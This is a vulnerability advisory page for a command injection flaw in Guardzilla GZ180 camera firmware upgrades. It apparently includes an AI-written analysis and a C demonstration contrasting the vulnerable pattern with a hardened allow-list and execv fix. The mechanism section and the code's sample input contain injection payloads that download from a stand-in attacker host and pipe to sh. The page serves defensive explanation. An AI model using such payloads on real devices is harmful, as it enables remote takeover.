CVE-2018-18600

HIGH 8.1 / 10.0
Published: December 31, 2018 at 04:29 PM
Modified: May 6, 2025 at 07:15 PM
Source: cve@mitre.org

Vulnerability Description

The remote upgrade feature in Guardzilla GZ180 devices allows command injection via a crafted new firmware version parameter.

CVSS Metrics

Base Score
8.1
Severity
HIGH
Vector String
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses (CWE)

Source: nvd@nist.gov
Source: 134c704f-9b21-4f2e-91b3-4a467353bcc0

AI Security Analysis

01 // Technical Summary

Guardzilla GZ180 devices are affected by a high-severity (CVSS 8.1) command injection flaw in the remote upgrade feature that lets a remote attacker execute arbitrary commands on the device. The flaw stems from the new firmware version parameter being passed, without validation, into a command that the upgrade process runs through a shell, so shell metacharacters in the parameter become additional commands. Exploitation requires neither authentication (PR:N) nor user interaction (UI:N) and yields high confidentiality, integrity and availability impact. The vector rates attack complexity as high (AC:H), which is why the score is 8.1 rather than the 9.8 a low-complexity variant would carry, and why the severity is HIGH rather than CRITICAL.

02 // Vulnerability Mechanism

Step 1: Target Identification: The attacker locates a Guardzilla GZ180 whose remote upgrade interface is reachable over the network (AV:N), for example through network scanning or public device listings.

Step 2: Payload Crafting: The attacker builds a new firmware version value that carries shell metacharacters followed by injected commands, for example "1.2.3; id;" or "1.2.3; wget http://attacker.com/malware | sh;". These payloads are illustrative of the technique; the advisory does not publish a specific exploit string.

Step 3: Request Submission: The attacker submits the crafted value to the device's remote upgrade interface as the new firmware version parameter. The advisory does not specify the transport; this analysis assumes a request to an upgrade endpoint exposed by the device.

Step 4: Command Execution: Because the upgrade logic passes the parameter into a shell command line without validating it, the shell splits the string at the injected separators and runs the attacker's commands alongside the intended upgrade command.

Step 5: System Compromise: The injected commands run with the privileges of the upgrade process, which on embedded devices of this class is commonly root (an assumption; the advisory does not state the privilege level). This gives the attacker a remote shell on the device, the ability to exfiltrate data, or a foothold for lateral movement on the local network.

03 // Deep Technical Analysis

The vulnerability lies within the remote upgrade functionality of the Guardzilla GZ180. The firmware update mechanism does not validate the new firmware version parameter before interpolating it into a command that is executed through a shell. The likely shape (an inference; the advisory does not publish the device code) is a call such as system("upgrade_firmware.sh -v <new_firmware_version>"), where <new_firmware_version> is taken directly from the request. Because /bin/sh parses the resulting string, a value such as "1.2.3; id" or "1.2.3 && wget http://attacker.com/malware | sh" terminates the intended command and starts the attacker's, which then runs with the privileges of the upgrade process. The root cause is the combination of an unvalidated parameter and a shell-interpreted command line; output encoding, which addresses injection into HTML or similar output contexts, is not the relevant defence here. The fix is to allow-list the version format (for example, digits and dots only) and to invoke the upgrade script directly with an argument vector (execv-style) rather than through a shell, so the version string can never be parsed as command syntax.
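The following C program is an added example, written for this page rather than taken from Guardzilla's firmware, that makes the five-step mechanism and the deep analysis above concrete. It models the inferred vulnerable pattern (the version parameter interpolated into a system()-style command line), shows what a shell would receive for a constructed injection payload, and places beside it the hardened form: a strict allow-list check on the version format followed by a direct execv() of the upgrade script with an argument vector, so no shell ever parses the parameter. The script path /usr/bin/upgrade_firmware.sh, the function names and the sample payload are assumptions for illustration; /bin/true stands in for the real upgrade script so the demonstration runs on any Linux host.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical shape of the vulnerable handler (not Guardzilla's code): the
 * attacker-controlled version is interpolated into a shell command line exactly
 * as a system("upgrade_firmware.sh -v <version>") call would do. The function
 * returns the string /bin/sh would be handed, without executing it. */
int build_upgrade_cmd_vulnerable(const char *version, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "/usr/bin/upgrade_firmware.sh -v %s", version);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Reports whether the built command line contains any character a POSIX shell
 * would treat as a command separator or substitution, i.e. whether the shell
 * would see more than the single intended command. */
bool cmd_contains_shell_metachar(const char *cmd)
{
    return strpbrk(cmd, ";|&`$<>\n") != NULL;
}

/* Allow-list validator: a version is one or more digit groups separated by
 * single dots (e.g. "1.2.3"), at most 32 bytes. Leading, trailing or doubled
 * dots and every other byte (';', '&', '|', '$', '`', whitespace, ...) fail. */
bool is_valid_version(const char *v)
{
    if (v == NULL || *v == '\0' || strlen(v) > 32) return false;
    bool prev_dot = true;           /* true at start so a leading dot is rejected */
    for (const char *p = v; *p; p++) {
        if (isdigit((unsigned char)*p)) {
            prev_dot = false;
        } else if (*p == '.' && !prev_dot) {
            prev_dot = true;
        } else {
            return false;           /* doubled dot or disallowed character */
        }
    }
    return !prev_dot;               /* reject a trailing dot */
}

/* Hardened launcher: validate first, then exec the script directly with an
 * argv array. No shell is involved, so even if a metacharacter slipped through
 * it would reach the script as a literal argument, never as command syntax.
 * Returns -1 when the input is rejected or the exec fails, else the child's
 * exit status. */
int run_upgrade_hardened(const char *script, const char *version)
{
    if (!is_valid_version(version)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {(char *)script, "-v", (char *)version, NULL};
        execv(script, argv);
        _exit(127);                 /* only reached if execv fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[256];
    const char *benign = "1.2.3";
    /* Constructed sample payload in the shape described in the analysis above. */
    const char *injected = "1.2.3; id; wget http://attacker.example/x | sh";

    build_upgrade_cmd_vulnerable(injected, cmd, sizeof cmd);
    printf("vulnerable handler hands the shell: %s\n", cmd);
    printf("shell would see extra commands: %s\n",
           cmd_contains_shell_metachar(cmd) ? "yes" : "no");
    printf("is_valid_version(\"%s\") = %d\n", benign, is_valid_version(benign));
    printf("is_valid_version(injected) = %d\n", is_valid_version(injected));
    printf("hardened run, injected input: %d (rejected)\n",
           run_upgrade_hardened("/bin/true", injected));
    printf("hardened run, benign input: %d (exit status of the script)\n",
           run_upgrade_hardened("/bin/true", benign));
    return 0;
}
```

The allow-list is deliberately tighter than "reject semicolons": denying a few known-bad characters leaves newline, backticks, $(...) and similar paths open, whereas accepting only the digit-and-dot grammar a firmware version actually needs closes them all. The execv() step is the second, independent layer: if the script path or arguments must be assembled from any external value, an argument vector keeps that value out of the shell's parser entirely.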
